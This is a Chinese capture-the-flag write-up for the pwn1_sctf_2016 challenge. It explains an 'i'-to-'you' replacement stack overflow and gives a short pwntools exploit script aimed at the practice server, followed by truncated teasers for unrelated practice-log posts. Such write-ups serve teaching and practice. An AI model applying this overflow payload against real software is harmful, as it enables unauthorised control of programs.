從ida和遠端的鏈結可以看出問題,ida(或者說在本地跑時,先接收一句話,後輸入點),而遠端的輸入點提前了,所以寫指令碼時要注意
問題解決:ret+1
參考from pwn import *
checksec 沒有任何保護
指令碼參考
這種方法類似是對'i'進行過濾定向替換成'you'(想起了伺服器對》以及php發的過濾,有點跑題),這種替換回填這解決了我們的棧空間控制問題,輸入的少,但轉化之後控制的多
0x3c=48+12=60=>20*3(基於'i'=》'you') 20*'i'+'bbbb'+ret滿足輸入的個數,這樣構造即可
from pwn import *
#context.log_level='debug'
#p=process('./pwn1_sctf_2016')
p=remote("node3.buuoj.cn",25348)
#p.recvuntil('tell me something about yourself: ') //遠端測試後是先接收後輸出
addr=0x08048f0d
payload=20*'i'+'bbbb'+p32(addr)
p.sendline(payload)
p.interactive()
OI刷題記錄
2014 4 18 poj3264 bzoj1699 balanced lineup rmq 2014 4 19 bzoj1012 jsoi2008 最大數maxnumber noi2004 鬱悶的出納員 bzoj3224 tyvj 1728 普通平衡樹 2014 4 20 bzoj1862 105...
面試刷題記錄
寫一段 判斷乙個包括 的表示式是否合法 注意看樣例的合法規則。給定乙個表示式a,請返回乙個bool值,代表它是否合法。測試樣例 a b 5 4 返回 true 測試樣例 a b 5 4 返回 false include vector include iostream using namespace ...
刷題記錄 2015 11 14
現在每天做的題都記錄一下,免得不知道自己在幹什麼。poj2406 用next陣列的定義求迴圈節 poj3261 字尾陣列 題 spoj705 同上,這題我wa了幾次,結果發現 我以為字串只有大寫字母,其實有小寫。如下 poj2406 author duyixian date 2015 11 14 1...